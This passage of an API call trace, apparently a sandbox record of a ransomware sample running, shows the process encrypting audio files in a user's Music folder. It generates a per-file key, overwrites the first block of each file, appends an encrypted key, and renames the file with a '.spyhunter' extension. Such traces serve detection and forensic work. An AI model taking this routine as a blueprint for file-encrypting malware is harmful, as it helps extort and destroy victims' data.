(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\xJNlc6b_JBw8gqW.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\xjnlc6b_jbw8gqw.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.988] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\xJNlc6b_JBw8gqW.mp3") returned 66 [0147.988] StrStrW (lpFirst="xJNlc6b_JBw8gqW.mp3", lpSrch=".txt") returned 0x0 [0147.988] GetProcessHeap () returned 0x2c0000 [0147.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.988] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248efdc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248efdc*=0x2800, lpOverlapped=0x0) returned 1 [0147.989] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.989] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248efdc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248efdc*=0x2800, lpOverlapped=0x0) returned 1 [0147.989] GetProcessHeap () returned 0x2c0000 [0147.989] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.989] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.989] WriteFile (in: hFile=0xa0, lpBuffer=0x248f01c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248efdc, lpOverlapped=0x0 | out: lpBuffer=0x248f01c*, lpNumberOfBytesWritten=0x248efdc*=0x4, lpOverlapped=0x0) returned 1 [0147.990] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248efdc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248efdc*=0x30, lpOverlapped=0x0) returned 1 [0147.990] CloseHandle (hObject=0xa0) returned 1 [0147.990] GetProcessHeap () returned 0x2c0000 [0147.990] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0147.990] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\xJNlc6b_JBw8gqW.mp3.spyhunter") returned 76 [0147.990] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\xJNlc6b_JBw8gqW.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\xjnlc6b_jbw8gqw.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\xJNlc6b_JBw8gqW.mp3.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\xjnlc6b_jbw8gqw.mp3.spyhunter")) returned 1 [0147.990] GetProcessHeap () returned 0x2c0000 [0147.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0147.990] GetProcessHeap () returned 0x2c0000 [0147.990] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0147.991] GetProcessHeap () returned 0x2c0000 [0147.991] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef6118 | out: hHeap=0x2c0000) returned 1 [0147.991] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f018 | out: pbBuffer=0x248f018) returned 1 [0147.991] GetProcessHeap () returned 0x2c0000 [0147.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0147.991] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248f010*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248f010*=0x30) returned 1 [0147.991] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\WF_9Vn_rV EP7h7hZ7c.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\wf_9vn_rv ep7h7hz7c.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.991] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\WF_9Vn_rV EP7h7hZ7c.wav") returned 70 [0147.991] StrStrW (lpFirst="WF_9Vn_rV EP7h7hZ7c.wav", lpSrch=".txt") returned 0x0 [0147.991] GetProcessHeap () returned 0x2c0000 [0147.991] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.991] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248efd4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248efd4*=0x2800, lpOverlapped=0x0) returned 1 [0147.992] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.992] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248efd4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248efd4*=0x2800, lpOverlapped=0x0) returned 1 [0147.992] GetProcessHeap () returned 0x2c0000 [0147.992] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.992] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.992] WriteFile (in: hFile=0xa0, lpBuffer=0x248f014*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248efd4, lpOverlapped=0x0 | out: lpBuffer=0x248f014*, lpNumberOfBytesWritten=0x248efd4*=0x4, lpOverlapped=0x0) returned 1 [0147.992] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248efd4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248efd4*=0x30, lpOverlapped=0x0) returned 1 [0147.993] CloseHandle (hObject=0xa0) returned 1 [0147.993] GetProcessHeap () returned 0x2c0000 [0147.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0147.993] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\WF_9Vn_rV EP7h7hZ7c.wav.spyhunter") returned 80 [0147.993] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\WF_9Vn_rV EP7h7hZ7c.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\wf_9vn_rv ep7h7hz7c.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\WF_9Vn_rV EP7h7hZ7c.wav.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\wf_9vn_rv ep7h7hz7c.wav.spyhunter")) returned 1 [0147.993] GetProcessHeap () returned 0x2c0000 [0147.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0147.993] GetProcessHeap () returned 0x2c0000 [0147.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0147.993] GetProcessHeap () returned 0x2c0000 [0147.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c81e88 | out: hHeap=0x2c0000) returned 1 [0147.994] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f018 | out: pbBuffer=0x248f018) returned 1 [0147.994] GetProcessHeap () returned 0x2c0000 [0147.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0147.994] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248f010*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248f010*=0x30) returned 1 [0147.994] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\u1fTt9rGTbm7cIqXW0.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\u1ftt9rgtbm7ciqxw0.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.994] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\u1fTt9rGTbm7cIqXW0.mp3") returned 69 [0147.994] StrStrW (lpFirst="u1fTt9rGTbm7cIqXW0.mp3", lpSrch=".txt") returned 0x0 [0147.994] GetProcessHeap () returned 0x2c0000 [0147.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.994] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248efd4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248efd4*=0x2800, lpOverlapped=0x0) returned 1 [0147.995] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.995] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248efd4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248efd4*=0x2800, lpOverlapped=0x0) returned 1 [0147.995] GetProcessHeap () returned 0x2c0000 [0147.995] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.995] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.995] WriteFile (in: hFile=0xa0, lpBuffer=0x248f014*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248efd4, lpOverlapped=0x0 | out: lpBuffer=0x248f014*, lpNumberOfBytesWritten=0x248efd4*=0x4, lpOverlapped=0x0) returned 1 [0147.995] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248efd4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248efd4*=0x30, lpOverlapped=0x0) returned 1 [0147.996] CloseHandle (hObject=0xa0) returned 1 [0147.996] GetProcessHeap () returned 0x2c0000 [0147.996] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0147.996] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\u1fTt9rGTbm7cIqXW0.mp3.spyhunter") returned 79 [0147.996] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\u1fTt9rGTbm7cIqXW0.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\u1ftt9rgtbm7ciqxw0.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\u1fTt9rGTbm7cIqXW0.mp3.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\u1ftt9rgtbm7ciqxw0.mp3.spyhunter")) returned 1 [0147.996] GetProcessHeap () returned 0x2c0000 [0147.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0147.996] GetProcessHeap () returned 0x2c0000 [0147.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0147.996] GetProcessHeap () returned 0x2c0000 [0147.997] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c81db0 | out: hHeap=0x2c0000) returned 1 [0147.997] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f010 | out: pbBuffer=0x248f010) returned 1 [0147.997] GetProcessHeap () returned 0x2c0000 [0147.997] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0147.997] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248f008*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248f008*=0x30) returned 1 [0147.997] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\PtE18yUiRd2-.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\pte18yuird2-.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0147.997] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\PtE18yUiRd2-.m4a") returned 63 [0147.997] StrStrW (lpFirst="PtE18yUiRd2-.m4a", lpSrch=".txt") returned 0x0 [0147.997] GetProcessHeap () returned 0x2c0000 [0147.997] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0147.997] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248efcc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248efcc*=0x2800, lpOverlapped=0x0) returned 1 [0147.998] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0147.998] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248efcc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248efcc*=0x2800, lpOverlapped=0x0) returned 1 [0147.998] GetProcessHeap () returned 0x2c0000 [0147.998] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0147.998] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0147.998] WriteFile (in: hFile=0xa0, lpBuffer=0x248f00c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248efcc, lpOverlapped=0x0 | out: lpBuffer=0x248f00c*, lpNumberOfBytesWritten=0x248efcc*=0x4, lpOverlapped=0x0) returned 1 [0147.998] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248efcc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248efcc*=0x30, lpOverlapped=0x0) returned 1 [0147.998] CloseHandle (hObject=0xa0) returned 1 [0147.999] GetProcessHeap () returned 0x2c0000 [0147.999] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0147.999] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\PtE18yUiRd2-.m4a.spyhunter") returned 73 [0147.999] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\PtE18yUiRd2-.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\pte18yuird2-.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\PtE18yUiRd2-.m4a.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\pte18yuird2-.m4a.spyhunter")) returned 1 [0147.999] GetProcessHeap () returned 0x2c0000 [0147.999] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0147.999] GetProcessHeap () returned 0x2c0000 [0147.999] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0147.999] GetProcessHeap () returned 0x2c0000 [0147.999] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c86040 | out: hHeap=0x2c0000) returned 1 [0147.999] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f010 | out: pbBuffer=0x248f010) returned 1 [0147.999] GetProcessHeap () returned 0x2c0000 [0148.000] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.000] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248f008*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248f008*=0x30) returned 1 [0148.000] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\LnP9sW3tyNbM.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\lnp9sw3tynbm.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0148.000] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\LnP9sW3tyNbM.wav") returned 63 [0148.000] StrStrW (lpFirst="LnP9sW3tyNbM.wav", lpSrch=".txt") returned 0x0 [0148.000] GetProcessHeap () returned 0x2c0000 [0148.000] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0148.000] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248efcc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248efcc*=0x154f, lpOverlapped=0x0) returned 1 [0148.001] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffeab1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.001] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x154f, lpNumberOfBytesWritten=0x248efcc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248efcc*=0x154f, lpOverlapped=0x0) returned 1 [0148.001] GetProcessHeap () returned 0x2c0000 [0148.001] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0148.001] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.001] WriteFile (in: hFile=0xa0, lpBuffer=0x248f00c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248efcc, lpOverlapped=0x0 | out: lpBuffer=0x248f00c*, lpNumberOfBytesWritten=0x248efcc*=0x4, lpOverlapped=0x0) returned 1 [0148.001] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248efcc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248efcc*=0x30, lpOverlapped=0x0) returned 1 [0148.001] CloseHandle (hObject=0xa0) returned 1 [0148.001] GetProcessHeap () returned 0x2c0000 [0148.001] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.001] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\LnP9sW3tyNbM.wav.spyhunter") returned 73 [0148.002] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\LnP9sW3tyNbM.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\lnp9sw3tynbm.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\LnP9sW3tyNbM.wav.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\lnp9sw3tynbm.wav.spyhunter")) returned 1 [0148.002] GetProcessHeap () returned 0x2c0000 [0148.002] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.002] GetProcessHeap () returned 0x2c0000 [0148.002] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.002] GetProcessHeap () returned 0x2c0000 [0148.003] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c85f78 | out: hHeap=0x2c0000) returned 1 [0148.003] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f008 | out: pbBuffer=0x248f008) returned 1 [0148.003] GetProcessHeap () returned 0x2c0000 [0148.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.003] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248f000*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248f000*=0x30) returned 1 [0148.003] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\l2XUKYHBSzQw6F.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\l2xukyhbszqw6f.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0148.003] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\l2XUKYHBSzQw6F.m4a") returned 65 [0148.003] StrStrW (lpFirst="l2XUKYHBSzQw6F.m4a", lpSrch=".txt") returned 0x0 [0148.003] GetProcessHeap () returned 0x2c0000 [0148.003] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0148.003] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248efc4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x248efc4*=0x2800, lpOverlapped=0x0) returned 1 [0148.004] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0148.004] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248efc4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x248efc4*=0x2800, lpOverlapped=0x0) returned 1 [0148.004] GetProcessHeap () returned 0x2c0000 [0148.004] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0148.004] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0148.004] WriteFile (in: hFile=0xa0, lpBuffer=0x248f004*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248efc4, lpOverlapped=0x0 | out: lpBuffer=0x248f004*, lpNumberOfBytesWritten=0x248efc4*=0x4, lpOverlapped=0x0) returned 1 [0148.004] WriteFile (in: hFile=0xa0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248efc4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248efc4*=0x30, lpOverlapped=0x0) returned 1 [0148.004] CloseHandle (hObject=0xa0) returned 1 [0148.005] GetProcessHeap () returned 0x2c0000 [0148.005] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2df1668 [0148.005] wnsprintfW (in: pszDest=0x2df1668, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\l2XUKYHBSzQw6F.m4a.spyhunter") returned 75 [0148.005] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\l2XUKYHBSzQw6F.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\l2xukyhbszqw6f.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\l2XUKYHBSzQw6F.m4a.spyhunter" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\l2xukyhbszqw6f.m4a.spyhunter")) returned 1 [0148.012] GetProcessHeap () returned 0x2c0000 [0148.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2df1668 | out: hHeap=0x2c0000) returned 1 [0148.012] GetProcessHeap () returned 0x2c0000 [0148.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0148.012] GetProcessHeap () returned 0x2c0000 [0148.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ef5f78 | out: hHeap=0x2c0000) returned 1 [0148.012] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f008 | out: pbBuffer=0x248f008) returned 1 [0148.012] GetProcessHeap () returned 0x2c0000 [0148.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0148.012] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248f000*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248f000*=0x30) returned 1 [0148.013] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\JcxqEST.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\byrvqm\\jcxqest.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0148.013] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\byrvqm\\JcxqEST.wav") returned 58 [0148.013] StrStrW 